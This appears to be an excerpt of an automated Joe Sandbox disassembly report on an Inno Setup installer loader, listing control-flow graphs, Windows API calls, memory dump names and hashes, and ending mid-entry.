                                                                                                                                        • Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                                                                        • Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                                                                        • SetWindowLongA.USER32(00010438,000000FC,00409960), ref: 0040AB15
                                                                                                                                          • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                                                                                          • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020724E0,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                                                                          • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020724E0,00409AD8,00000000), ref: 00409A70
                                                                                                                                          • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                                                                          • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                                                                          • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020724E0,00409AD8), ref: 00409AA4
                                                                                                                                        • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                                                                        • DestroyWindow.USER32(00010438,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                                                                        • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                                                        • API String ID: 3586484885-3001827809
                                                                                                                                        • Opcode ID: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                                                                        • Instruction ID: d3376fcde1141b4290a3dca450fc2844fa47922897975e075ebf06e3b6db64eb
                                                                                                                                        • Opcode Fuzzy Hash: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                                                                        • Instruction Fuzzy Hash: 77411A71604204DFD714EBA9EE85B5A37B5EB48304F20427BF500BB2E1D7B8A855CB9D

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020724E0,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020724E0,00409AD8,00000000), ref: 00409A70
                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                                                                        • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020724E0,00409AD8), ref: 00409AA4
                                                                                                                                          • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020724E0), ref: 0040966C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                                                                        • String ID: D
                                                                                                                                        • API String ID: 3356880605-2746444292
                                                                                                                                        • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                                                        • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                                                                                                        • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                                                        • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 136 401918-40193a RtlInitializeCriticalSection 137 401946-40197c call 4012dc * 3 LocalAlloc 136->137 138 40193c-401941 RtlEnterCriticalSection 136->138 145 4019ad-4019c1 137->145 146 40197e 137->146 138->137 149 4019c3-4019c8 RtlLeaveCriticalSection 145->149 150 4019cd 145->150 148 401983-401995 146->148 148->148 151 401997-4019a6 148->151 149->150 151->145
                                                                                                                                        APIs
                                                                                                                                        • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                                                        • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                                                        • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                                                        • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 730355536-0
                                                                                                                                        • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                                                        • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                                                                        • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                                                        • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message
                                                                                                                                        • String ID: .tmp$y@
                                                                                                                                        • API String ID: 2030045667-2396523267
                                                                                                                                        • Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                                                        • Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
                                                                                                                                        • Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                                                        • Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message
                                                                                                                                        • String ID: .tmp$y@
                                                                                                                                        • API String ID: 2030045667-2396523267
                                                                                                                                        • Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                                                        • Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
                                                                                                                                        • Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                                                        • Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                                                        • String ID: .tmp
                                                                                                                                        • API String ID: 1375471231-2986845003
                                                                                                                                        • Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                                                                        • Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
                                                                                                                                        • Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                                                                        • Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 342 407749-40774a 343 4076dc-4076e6 WriteFile 342->343 344 40774c-40776f 342->344 345 4076e8-4076ea call 40748c 343->345 346 4076ef-4076f2 343->346 347 407770-407785 344->347 345->346 351 407700-407704 346->351 352 4076f4-4076fb call 4073ec 346->352 348 407787 347->348 349 4077f9 347->349 353 40778a-40778f 348->353 354 4077fd-407802 348->354 355 40783b-40783d 349->355 356 4077fb 349->356 352->351 359 407803-407819 353->359 362 407791-407792 353->362 354->359 360 407841-407843 355->360 356->354 361 40785b-40785c 359->361 370 40781b 359->370 360->361 363 4078d6-4078eb call 407890 InterlockedExchange 361->363 364 40785e-40788c 361->364 365 407724-407741 362->365 366 407794-4077b4 362->366 387 407912-407917 363->387 388 4078ed-407910 363->388 380 407820-407823 364->380 381 407890-407893 364->381 369 4077b5 365->369 372 407743 365->372 366->369 374 4077b6-4077b7 369->374 375 4077f7-4077f8 369->375 376 40781e-40781f 370->376 378 407746-407747 372->378 379 4077b9 372->379 374->379 375->349 376->380 378->342 382 4077bb-4077cd 378->382 379->382 384 407824 380->384 385 407898 380->385 381->385 382->360 386 4077cf-4077d4 382->386 389 407825 384->389 390 40789a 384->390 385->390 386->355 394 4077d6-4077de 386->394 388->387 388->388 392 407896-407897 389->392 393 407826-40782d 389->393 395 40789f 390->395 392->385 396 4078a1 393->396 397 40782f 393->397 394->347 405 4077e0 394->405 395->396 402 4078a3 396->402 403 4078ac 396->403 399 407832-407833 397->399 400 4078a5-4078aa 397->400 399->355 399->376 404 4078ae-4078af 400->404 402->400 403->404 404->395 406 4078b1-4078bd 404->406 405->375 406->385 407 4078bf-4078c0 406->407
                                                                                                                                        APIs
                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3934441357-0
                                                                                                                                        • Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                                                                        • Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
                                                                                                                                        • Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                                                                        • Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 408 401fd4-401fe6 409 401fe8 call 401918 408->409 410 401ffb-402010 408->410 414 401fed-401fef 409->414 412 402012-402017 RtlEnterCriticalSection 410->412 413 40201c-402025 410->413 412->413 415 402027 413->415 416 40202c-402032 413->416 414->410 417 401ff1-401ff6 414->417 415->416 418 402038-40203c 416->418 419 4020cb-4020d1 416->419 420 40214f-402158 417->420 423 402041-402050 418->423 424 40203e 418->424 421 4020d3-4020e0 419->421 422 40211d-40211f call 401ee0 419->422 425 4020e2-4020ea 421->425 426 4020ef-40211b call 402f54 421->426 429 402124-40213b 422->429 423->419 427 402052-402060 423->427 424->423 425->426 426->420 431 402062-402066 427->431 432 40207c-402080 427->432 440 402147 429->440 441 40213d-402142 RtlLeaveCriticalSection 429->441 433 402068 431->433 434 40206b-40207a 431->434 436 402082 432->436 437 402085-4020a0 432->437 433->434 439 4020a2-4020c6 call 402f54 434->439 436->437 437->439 439->420 441->440
                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                                                                                          • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                                                          • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                                                          • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                                                          • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 296031713-0
                                                                                                                                        • Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                                                                        • Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
                                                                                                                                        • Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                                                                        • Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 444 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                                                                        • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLibraryLoadMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2987862817-0
                                                                                                                                        • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                                                        • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                                                                        • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                                                        • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                                                                        APIs
                                                                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                                                                          • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$FilePointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1156039329-0
                                                                                                                                        • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                                                        • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                                                                        • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                                                        • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 448 40762c-40764a ReadFile 449 407663-40766a 448->449 450 40764c-407650 448->450 451 407652-40765a GetLastError 450->451 452 40765c-40765e call 40748c 450->452 451->449 451->452 452->449
                                                                                                                                        APIs
                                                                                                                                        • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileLastRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1948546556-0
                                                                                                                                        • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                                                        • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                                                                        • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                                                        • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                                                                        APIs
                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                                                                          • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$FilePointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1156039329-0
                                                                                                                                        • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                                                        • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                                                                        • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                                                        • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$AllocFree
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2087232378-0
                                                                                                                                        • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                                                        • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                                                                        • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                                                        • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                                                                        APIs
                                                                                                                                        • GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
                                                                                                                                          • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
                                                                                                                                          • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
